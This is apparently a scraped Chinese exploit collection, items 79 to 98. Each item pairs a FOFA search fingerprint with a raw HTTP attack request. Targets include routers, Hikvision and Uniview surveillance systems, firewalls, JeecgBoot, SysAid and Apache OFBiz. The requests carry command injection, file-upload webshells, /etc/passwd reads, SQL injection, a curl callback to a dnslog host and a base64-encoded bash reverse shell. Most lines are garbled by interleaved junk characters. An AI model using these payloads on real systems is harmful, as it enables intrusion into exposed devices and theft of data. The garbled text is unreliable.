------YsOxWxSvj1KyZow1PTsh98fdu6l--! W+ Z$ G- o5 W4 ~7 e N1 D
Z8 t; Y9 `- H2 g$ v# a! U
, ]$ M5 d- f1 ^3 u" v5 l/ Y7 ^. x
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.10 S8 P1 n6 q; i: K, I; h% _( e
Host: x.x.x.x9 e+ o6 m; h b( }4 s0 _
, a; N9 z2 ~$ I2 k; D
6 g; p) f+ S4 y9 L! g79. BYTEVALUE 百为流控路由器远程命令执行
3 e7 k+ n$ I) V! UFOFA:BYTEVALUE 智能流控路由器
. W; R0 v' A$ ?2 {* K" M9 kGET /goform/webRead/open/?path=|id HTTP/1.1
/ L2 M! k$ c, [2 i/ CHost:IP
/ k$ o6 `. s' } W2 P5 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
0 z, X+ W; k0 D) hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 W3 c$ M8 G* W8 F6 I6 I, pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 U; X9 a2 d- A
Accept-Encoding: gzip, deflate: S# H- H& j; |. r- j% a
Connection: close y8 Z' Q& j6 H# l' X# y) ^& m3 R
Upgrade-Insecure-Requests: 1$ E6 K& h; ]. Y7 G
7 f$ F4 a. y; \' A7 a# C0 W+ J" {& W4 w+ |* t
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
3 j* a- G5 u' p4 rFOFA:app="速达软件-公司产品"
# `. s. [+ N% C V8 B0 _" @POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.11 s1 [# |7 v* r% ]) |. m
Host: x.x.x.x( m( @& M. g$ M" P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* W6 G6 b6 A8 g+ a9 e
Content-Length: 272 P$ S* Y& E. |; x7 |" s! E: k9 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 j/ _- C5 k% F7 P( ?- { d- I2 q
Accept-Encoding: gzip, deflate( j- Y0 b6 h, T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 B7 d1 j3 Q/ @- _Connection: close
9 K8 T* C" z" D- W/ J) JContent-Type: application/octet-stream
% r9 y8 F, k6 [2 @& W. b7 }+ ?$ sUpgrade-Insecure-Requests: 1
) O. C B+ D j6 A, a$ J* R" D1 b
# d- D r& U" Y" ]<% out.print("oessqeonylzaf");%>) P! i& M5 S& N5 e2 K! J, r7 i
+ |8 `* x& Z1 T" C7 @
$ |: O# {2 @+ C! u5 I3 ]- w1 b
GET /xykqmfxpoas.jsp HTTP/1.1
+ i l# Q0 ~* k* @% G2 J0 q+ yHost: x.x.x.x3 A: Y0 {6 u8 a: y+ `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, D% i& H! H; _: tConnection: close
8 v8 F; p3 Y4 FAccept-Encoding: gzip
5 n; y+ M2 I- B- f: ]$ ]& R" r: J8 P* }5 M) h) G
% w3 h- P7 V$ ^2 _0 s' j5 B5 ]7 S
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露$ [/ t+ ?/ `, e" ^% Z5 r3 ]4 a
FOFA:app="uniview-视频监控"2 G Y8 y {0 j0 v- a0 U
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1# @- L: @7 G2 b
Host: x.x.x.x
: a u: p+ F' K7 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 T: Z; p$ I" `( D0 q' X3 L
Connection: close. f/ {. g, D$ f
Accept-Encoding: gzip
+ F1 F5 \6 ?* Q' g& L# ~
4 t1 N6 ^& u' K9 g& A; \2 q0 Y) ~6 Q: L s1 z* A
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行7 w. h+ }: Y4 l$ n v
FOFA:app="思福迪-LOGBASE"% @5 S# v! M- p* d
POST /bhost/test_qrcode_b HTTP/1.1
. R8 Y0 T2 a# l6 Y/ ]+ s* `Host: BaseURL
8 H; V7 Y# _3 g PUser-Agent: Go-http-client/1.11 }/ X6 G+ L) E5 C- V
Content-Length: 23
8 \; P. h# @) V/ f h2 @Accept-Encoding: gzip8 O# t. y2 [6 _0 M! z
Connection: close- H s& E/ W1 |+ e
Content-Type: application/x-www-form-urlencoded" y5 \0 ]7 L( v5 ]' f
Referer: BaseURL
- l8 [2 j8 o/ x# e; [7 p Q9 D1 H) R
% p1 @# L. j! w+ r: Rz1=1&z2="|id;"&z3=bhost
2 S* `; k; y$ V* j% P7 V" Q# e3 Z$ L2 W+ A; Z: w* L" M4 R) x9 V9 \8 p
) G2 _7 U6 e, J A- S5 {83. JeecgBoot testConnection 远程命令执行9 F* I6 Z1 R1 h0 E u/ Y" U" J
FOFA:title=="JeecgBoot 企业级低代码平台"
: i: u9 i' e6 h3 o
0 q K" o$ O) ^5 j
- H1 ?! U1 j2 @4 gPOST /jmreport/testConnection HTTP/1.1
: G* \ p" E! B1 \4 z i! F$ J& bHost: x.x.x.x
\7 A5 J8 v. OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! x" H. [9 n' |$ s, P7 FConnection: close0 o% f( T( N- C! q
Content-Length: 8881
4 Y9 V- i$ m: U! O n6 X2 EAccept-Encoding: gzip
/ y& s. G+ C3 KCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"7 B9 |4 | u) O2 @; ~
Content-Type: application/json
}: f3 [" w: B8 D }9 N3 c- L9 S m+ C9 B3 X
PAYLOAD" g' ^- [0 p' M5 L* B0 C! Y
1 f& Q% |7 b6 X; X84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
' N7 |, N8 V6 C3 h) \8 eFOFA:title=="JeecgBoot 企业级低代码平台". D, T# R$ H* Q7 c1 n
4 z' c- y: p; k1 H
3 j: y+ r: u; S: q7 Z2 M
! J! E, y, L/ e, e! W. s8 GPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1* d7 l3 \4 V. q" @9 q9 F
Host: 192.168.40.130:8080
/ ~/ k6 K2 q( i5 Y& R) a1 aUser-Agent: curl/7.88.1
0 T% Z+ A! V7 y# R& x7 n3 _Content-Length: 156
% i# H; |* ?# c) p& e! N2 qAccept: */** z# m9 N, R' D
Connection: close
8 W* i. F" m3 gContent-Type: application/json. {( ^. u2 z. X# o& n$ o
Accept-Encoding: gzip
( |: c2 O2 f# \7 C: H: a6 Q8 J* i" o1 F0 L- {
{
4 o* X/ d" y4 ~( B2 h0 j3 K "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",6 C( t) c1 u% k, g
"type": "0"( o$ v# P- E3 Y$ }9 M/ O% N5 f
}9 W4 g( B% N& N. o$ @/ h* U" `/ A
% _' Z, u7 @% S
: G: [- m5 a; ~/ T% U) n3 { d85. SysAid On-premise< 23.3.36远程代码执行
1 s/ y g% I+ oCVE-2023-472466 ?" m4 o& b8 r$ B
FOFA:body="sysaid-logo-dark-green.png" . p1 n+ k; \% J5 Y9 N5 v) ?: N
EXP数据包如下,注入哥斯拉马
7 ]' E# h9 P8 ?! ]' k1 JPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1/ j3 S& Z9 w r6 Q" ?
Host: x.x.x.x2 R/ M. @, n; v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! z( y+ t- l! k1 [. }Content-Type: application/octet-stream
# z6 Y# W& C. u+ w/ w4 lAccept-Encoding: gzip* b0 ?- \& [6 u: j! _* D. O. E: G
% k! ?' A# H: F+ a7 r; ~
PAYLOAD. |, V/ |- b& p7 ?7 z0 q& m
( u ?6 n: r- l3 E, @# j H
回显URL:http://x.x.x.x/userfiles/index.jsp
5 u5 `+ Y/ D" b; o; z0 m) x4 _; y3 _. Y+ F. A; l% G
86. 日本tosei自助洗衣机RCE9 u, N9 i6 o! ]7 ]/ p
FOFA:body="tosei_login_check.php"& i4 m5 E* A! E- |* _4 {
POST /cgi-bin/network_test.php HTTP/1.1
+ Y4 Z2 K8 q3 l8 y9 P. J* D, qHost: x.x.x.x% b2 R9 B _! g4 f$ w
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
* f1 @+ p/ q! Q m8 ~ RConnection: close
; T6 u& K7 x9 s% F- M: r6 {' CContent-Length: 44: b9 R# p3 l9 R; P( b8 P/ z8 Q
Accept: */*
' K" ] z, Q: D& M, o, X( [3 l. aAccept-Encoding: gzip
0 {9 c; p+ u$ O( ]Accept-Language: en6 p! h0 ~/ |7 K& m/ R% ]9 J% O7 i
Content-Type: application/x-www-form-urlencoded
8 t+ A: Z0 m% D9 g
$ Q5 |- e9 p; z, y% T- uhost=%0acat${IFS}/etc/passwd%0a&command=ping
* ~8 ^& D7 \% W5 E2 l) w/ `" d# f6 n
3 x9 }- m' W3 U9 ^7 ?$ A- y5 o% A
87. 安恒明御安全网关aaa_local_web_preview文件上传+ a5 g5 O+ `" j; J4 d3 T7 m
FOFA:title="明御安全网关"
9 T: F; c% D4 L$ N" d$ u% ]! LPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
' @ N7 J! W, PHost: X.X.X.X8 z8 [$ M4 F+ W& ]" K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 _- r1 [# q: n$ k$ p
Connection: close
0 b% f+ m2 j# P2 @# F, nContent-Length: 198
, l+ {2 a# n; p' d( W" a% ~& RAccept-Encoding: gzip
1 d" M- y0 Q% l" {9 ZContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd) ]. k0 W5 u I1 f- b
, o) p, I4 v1 i--qqobiandqgawlxodfiisporjwravxtvd$ ]; `/ m6 f5 z. W9 _% ?2 u, B4 y
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
& r$ @4 x4 ]+ qContent-Type: text/plain/ h$ U6 L2 e1 P+ A) f8 P
$ y9 B. a r9 I2ZqGNnsjzzU2GBBPyd8AIA7QlDq9 y9 r0 x$ b6 h9 p a( {
--qqobiandqgawlxodfiisporjwravxtvd--
) `& R' i& n' r t, D: C% |. R5 `0 l" @0 c1 N
3 q; y/ d5 t4 y6 K8 J4 F) N h
/jfhatuwe.php$ }; G9 C8 C4 w0 P
* j3 X ~' \- i8 A
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
: I3 V0 Z2 [6 g9 R q; w0 L" RFOFA:title="明御安全网关") M, y( v& K+ s3 V
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
2 g* [4 s7 e1 v P% e6 E5 T, X4 tHost: x.x.x.xx.x.x.x
, T9 x ~9 n0 O. |' o) u" PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ x/ z8 Y( x9 [& J, }& {; K- B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; D2 q+ H' h9 b8 l6 v1 J/ S. I$ ZAccept-Encoding: gzip, deflate: L) ?; b8 C6 D; W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Z! t9 F, g5 l) ?Connection: close
9 g4 Y2 S4 {3 i" w* p2 i# a6 Z6 j! r" v
: K6 r) K# T* P. }" n
/astdfkhl.php
' y$ E5 S& r6 V- y
4 ~7 U) I. M% Y+ l$ M. O2 x89. 致远互联FE协作办公平台editflow_manager存在sql注入
1 h) d( w* z# G) jFOFA:title="FE协作办公平台" || body="li_plugins_download". G3 ?1 H# V$ A6 I- {
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
. ? P1 ?! g; p0 m$ ZHost: x.x.x.x6 c6 i) M0 r: @" \ N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: s( L, D1 H3 }/ O0 s
Connection: close, ], l( u: a2 T' e4 l
Content-Length: 410 T% z5 U F T
Content-Type: application/x-www-form-urlencoded
0 }% X) ~0 c$ p% {+ DAccept-Encoding: gzip; l( D4 Z( X# z) q
, l4 w- A$ M8 _/ l# P! s* Uoption=2&GUID=-1'+union+select+111*222--+
. f5 r2 o+ F8 |. a2 |% g! t
. {9 I# _5 I. D& L, k: q1 H9 N$ t3 ?3 `
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行; I: {2 L/ D( z) h7 r
FOFA:icon_hash="-1830859634"
- ?& j4 {$ @" {0 c3 u/ dPOST /php/ping.php HTTP/1.13 z g/ S/ M; `0 U4 ~
Host: x.x.x.x
3 [' ^2 b, `/ Q; BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
% V0 g1 D5 j% G+ X9 E: h# c% {; BContent-Length: 51/ W- s% |% B& c) i
Accept: application/json, text/javascript, */*; q=0.01. S4 |. O: r& F$ k7 @
Accept-Encoding: gzip, deflate* ?+ }. T# \; z; {3 e1 J+ X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) {7 V1 Y7 o$ {
Connection: close, F& i* E! N2 B
Content-Type: application/x-www-form-urlencoded
$ Y# `3 Q5 i( nX-Requested-With: XMLHttpRequest
3 {, d4 m8 M" o$ H6 _' s) R |' j; ~
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
, H" ]+ h/ V5 `/ v) O' y, c K' U! m. B+ k9 @9 p* L4 x0 P' q
" h, g1 O/ `! ~4 ]8 u) b( T91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
; M/ {" ]" h9 l, VFOFA:title="综合安防管理平台"
( r- T) D' o+ G) P5 i9 B0 kGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
9 u9 `+ l' q0 U5 F1 o1 @ y3 y" t3 ?Host: your-ip
3 D1 N8 i0 m" I* f2 x. UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36% c; C4 D, F$ j2 r* V9 I
Accept-Encoding: gzip, deflate+ b/ e U( O- n& d
Accept: */*
( _* x3 G# P" Q% W3 E! C4 l4 IConnection: keep-alive
5 r! J/ o- Z4 k, B9 a0 l+ g& B
5 Z' F; ]% `, E9 ~
4 G# ?; Z, g6 ]$ v92. 海康威视运行管理中心session命令执行( F" c, i, M) m/ h% F& p
Fastjson命令执行
7 n' T) R+ t+ t+ ihunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
% D2 |0 e0 a! t0 wPOST /center/api/session HTTP/1.1- j- d( {& P' R& Z9 I6 V ~
Host:
4 X. T# {2 ~, F- {7 s% }Accept: application/json, text/plain, */*
. W) x' L! ?7 D; l9 TAccept-Encoding: gzip, deflate
: o1 P1 K1 t0 Q1 r ]/ n. y* v( rX-Requested-With: XMLHttpRequest
2 p P6 J, q+ R6 WContent-Type: application/json;charset=UTF-8
4 w* O; K7 u3 g( K/ j NX-Language-Type: zh_CN0 `8 t E" d) x1 d
Testcmd: echo test, f. n Q; u2 ]8 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.364 s! @ Q% k$ B8 Y
Accept-Language: zh-CN,zh;q=0.9
; F w, g; b- w9 _1 d) uContent-Length: 57787 j' L$ X. \% M' P
; B7 C U8 {. _+ d
PAYLOAD0 x3 S8 O9 @% E$ I0 ^
* }5 A; p9 X, W5 l" z
* t' p3 x2 D+ P/ U9 s: D% F3 r
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传& {- f3 h3 D8 n( h5 ~, `) D7 L
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==" v g2 h, W3 n3 @6 i
POST /?g=app_av_import_save HTTP/1.1
( {: v& v9 F8 ?1 J7 ]3 q j( EHost: x.x.x.x* S; g! {3 V. i8 G) |
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
: D n! k3 o2 R$ qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 c) s, O- D" A! i- Y I
5 o6 l% {6 Q" h3 u W6 r( B
------WebKitFormBoundarykcbkgdfx5 ~* d6 Y$ ~" ]# e0 }0 D8 V# p
Content-Disposition: form-data; name="MAX_FILE_SIZE"
$ x0 Y D% e3 N- k$ ~: K! f1 q9 ~9 \& B+ m3 C
100000008 ]; w% w/ ^! m) w4 r4 R
------WebKitFormBoundarykcbkgdfx
0 V) t) W h( P2 z3 W pContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"5 L/ t' J4 \0 L9 S) I
Content-Type: text/plain: H9 B; B0 P2 s2 N; y4 T5 l# x( e# e# n
7 q1 h! `; R" Z( j" E9 ~. wwagletqrkwrddkthtulxsqrphulnknxa
8 t1 X9 A6 |% T9 X* C------WebKitFormBoundarykcbkgdfx
8 Q4 G. A1 m7 x. F9 f- wContent-Disposition: form-data; name="submit_post"8 a0 _: m4 C% u& a
! u1 f/ b ~. S0 ?
obj_app_upfile# o' M- t5 e! B3 c% Q: e
------WebKitFormBoundarykcbkgdfx
! |. ~/ Z3 P1 j! D( S3 i; PContent-Disposition: form-data; name="__hash__"
$ j& q, ?' `1 h. K8 p8 I( y8 C* g) p$ i2 y5 j. R- l
0b9d6b1ab7479ab69d9f71b05e0e9445
3 P/ U" s4 Q5 J; k2 g/ ]------WebKitFormBoundarykcbkgdfx--
1 z2 @$ `" M' y0 e3 `, g9 F1 [5 N
7 E: z7 g2 m2 K5 ?+ I1 \
GET /attachements/xlskxknxa.txt HTTP/1.1
8 P! _# i8 q- CHost: xx.xx.xx.xx
* U" x1 r" Q0 u d; U: AUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 }, E8 S( |/ H, e9 a( ?6 e% r9 n1 R! ?! u f/ W# S! ?1 M
- S! x& m1 }9 e1 U: r; p
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传$ i; B2 Z' c0 ]$ q' c: s
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
l: Y- ]0 H( ]4 y2 o0 M- o6 ePOST /?g=obj_area_import_save HTTP/1.1. w& O- w: ]0 F! M# @- F
Host: x.x.x.x
# f1 N e0 P8 {8 W' |. H4 nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt: G" @( y1 p) P* n u+ N' [3 G6 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- [, j) F" B* H8 @6 y# H; ]' x& x4 C* W5 U& ?
------WebKitFormBoundarybqvzqvmt
4 T. _3 \8 X" P% m$ O9 E; N n+ ? }Content-Disposition: form-data; name="MAX_FILE_SIZE"
" n' p4 k3 Q K8 d) ]/ h9 a- D" [1 D @5 q" o, {, `, o6 S' L
10000000- s% z; a H$ x- d, i
------WebKitFormBoundarybqvzqvmt
/ t8 V9 u* Y2 X' CContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"" c2 ~" z$ h' L* m! ~5 q- y
Content-Type: text/plain y2 V; a# K" i% U! m
) l4 W e2 R$ ]6 W+ }
pxplitttsrjnyoafavcajwkvhxindhmu( }4 x( N% t q4 O: `$ t1 X
------WebKitFormBoundarybqvzqvmt
: d" Z+ ?. x% w0 m S5 S; sContent-Disposition: form-data; name="submit_post"2 N. O: F; r* u2 P" X
2 m; p4 c: G' D8 Q0 f. Q% K
obj_app_upfile
( o* A9 f: L+ I- f' |' A: q------WebKitFormBoundarybqvzqvmt" W8 @, @2 |8 U( z
Content-Disposition: form-data; name="__hash__"0 ]* Z% o% f0 D' j+ B; u' r
5 M8 Z! Q1 v7 T9 O; q4 b4 Y. j
0b9d6b1ab7479ab69d9f71b05e0e9445
) X6 E, B. \4 Q) a; {------WebKitFormBoundarybqvzqvmt--
- W& r* o* t' {2 v3 X/ m0 L
1 T2 i, C4 i5 h k# U; W) d3 V v& r( z) S& f+ ?
+ @( p# y$ ? R: C
GET /attachements/xlskxknxa.txt HTTP/1.1" n( X$ c) B8 G) }$ ]
Host: xx.xx.xx.xx
% T4 o) p3 ~9 Z+ i0 T9 O/ z' NUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
0 {% t' ?0 }. K/ e5 M
! X9 {% V3 `0 e1 J0 y. ?1 S" {& M$ z8 y3 w
. b5 I3 _ S6 R
& \( [" u& |: n! w' N$ N95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
, @% m. i$ U9 d& d8 O" ?CVE-2023-49070
4 o v4 r) k6 O# k( ?( [# oFOFA:app="Apache_OFBiz"; b. B9 T0 r h* o) V3 d+ _: W/ \
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1$ c' R; |& ~0 ]& X5 S; ~
Host: x.x.x.x. [/ `' F& Q' F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
. x0 d& ?7 \' w* e6 u) EConnection: close& ~3 I6 r$ }: t+ e( Z/ T
Content-Length: 889
4 C: k! b- C+ a) ~( T! t" ]" R: ^6 tContent-Type: application/xml; w( T+ w+ u ]; U0 w. A# m
Accept-Encoding: gzip/ L! k" C/ ~# a! y
3 h* M2 h! k9 L! [
<?xml version="1.0"?>) H' {9 r/ D/ n/ ^6 D& F }
<methodCall>
$ ?/ p* [+ H; C5 o, i* I6 L2 E <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>- c1 z, Z% L* Z O1 ]9 u
<params>' C, A$ H5 k3 c ^- S& c8 X g
<param>
8 `& |3 l' ~$ W# @. `3 s1 a- [ <value>, _7 E% _8 O8 [. I# S7 G/ e
<struct>
* _+ H" z# A) b+ u2 Z <member>6 I$ B' d4 ~+ L9 [8 d( o3 f
<name>test</name>
N' V9 y6 N! l9 A T6 K! p7 Z <value>$ Z' k+ }9 g6 j* @- f, t6 U ?
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
) D% ?/ m) i9 r: C" d6 P* A </value>% W7 A j" d, j! O, p1 R
</member>
0 P# H9 I8 x2 q& I3 p; u8 z. ` </struct>
$ ~6 H" q2 w8 g, R </value>
' V" b% T- }5 [* a8 x( r( ` </param>1 F& \# O/ |" m* f" x
</params>
3 q9 d+ j, T, v- `% ~' I: x</methodCall>
$ b. S p+ h2 z* P' Q2 @, Y$ T6 I! Z n* i8 X& G
5 P5 M9 J6 ?& g用ysoserial生成payload
7 g2 t2 o7 l: f6 v; Hjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"4 {3 e6 Q& b- t
" D5 q( H: H# R0 c8 ] S& Y4 _" C0 r
1 s5 V o1 K) R' j$ I+ y- `& [ |
将生成的payload替换到上面的POC
* n3 I* |' P' h8 [+ X5 lPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
( n6 J- c/ c }$ EHost: 192.168.40.130:84430 k9 R' D1 z a& ^) F) Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
) b$ A' Q% Z0 B4 ]) j! X3 LConnection: close
( G# {* y; b' G, Q% kContent-Length: 889& L: r2 W# g( g; S7 e1 E& @
Content-Type: application/xml
' H5 m5 y J, R4 v0 F( L* U+ m$ WAccept-Encoding: gzip
7 F! g6 Q) i2 D% H0 [% J2 y
K& C- s7 |4 A7 ~1 [" ^* nPAYLOAD) {& S. f5 C' e4 z
, f6 O7 ] G" u: R" m" Z96. Apache OFBiz 18.12.11 groovy 远程代码执行& b0 P- i" z' U$ b
FOFA:app="Apache_OFBiz"
4 n2 A( ~# U6 P1 S1 dPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1& T6 N$ e* l4 X* f) v% J
Host: localhost:8443
6 \* ?7 S3 |4 N6 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
. [) N; k9 u1 k2 b0 e9 W5 jAccept: */*6 A( m) u1 q" T& n1 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 F# N7 }: H8 f/ f' t$ s. o0 ^
Content-Type: application/x-www-form-urlencoded
& K6 l& {4 N0 o) j" h6 eContent-Length: 55
5 z, |" ]- U' W \& R+ ]" Z! @
groovyProgram=throw+new+Exception('id'.execute().text);
# k4 d/ A" U, z3 O' O8 N7 o' V* v( }; S. S2 v
4 [0 o3 | n' u
反弹shell. w/ V9 c$ i5 b. r; ]$ M
在kali上启动一个监听' w: T% l- h( C4 s: M* ?/ }
nc -lvp 7777
$ \! Z8 ]7 S/ G" e+ g/ F) k$ ?
# K4 n& K. T' e9 L; B; HPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1 I: ^$ @* ?& O4 i; U
Host: 192.168.40.130:8443# Z; {" Y: B, y. m) S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.08 Z) g7 K4 d. I, o2 y. F. e
Accept: */*
8 l' L! x8 Y7 RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ V) ]' Q2 F# r; ?( z* Q5 ^- dContent-Type: application/x-www-form-urlencoded
1 R- i/ X- T! t1 S8 Z6 D1 R P% L; OContent-Length: 71$ n/ T+ W# @# t: }
( ~4 m) [* `) a F0 Q4 G
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
4 v ~9 ?! _& f& q7 d$ P9 W3 G7 L, B; f0 U$ I
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行3 o e: W0 ?; g
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
2 j* K, k* e/ s+ C$ ^) OGET /passport/login/ HTTP/1.1
}- O, {0 y+ y9 vHost: 192.168.40.130:8085
( u' _& X0 s5 B, ~" V" J& KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 i8 s* K) A8 o8 v& q W9 V# {
Accept-Encoding: gzip9 V. T! Y4 p" s/ S$ t) W
Connection: close/ Y+ p- X' B. Z
Cookie: rememberMe=PAYLOAD
3 b7 d: J/ b% ~, J' l; _5 YX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
7 c9 E* E! p2 `* N5 y% L1 L% k
$ Z1 z- i/ L' h2 a0 r6 i) e Q9 W& F' F |- }4 a3 ^
98. SpiderFlow爬虫平台远程命令执行
0 ]/ F# p6 S6 _% lCVE-2024-0195. v5 h+ T7 ?( a, e2 ^
FOFA:app="SpiderFlow"
1 x) F. O5 o" Z! O6 r- n. Y* `, U. ?POST /function/save HTTP/1.1
* ^' g, c$ }$ }! n2 ^" I2 R N& `1 DHost: 192.168.40.130:8088
- b6 N6 W# j8 J0 V% y6 Q8 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 t+ L" {+ y' @3 ~3 l, O* O. Y4 S
Connection: close
& R5 B3 f& j& h. ?Content-Length: 121& o) Q6 ~; y1 D/ O7 O
Accept: */*
. n; ]' W4 t" }- p' a1 A8 mAccept-Encoding: gzip, deflate1 N7 z5 i6 g: O7 W- m
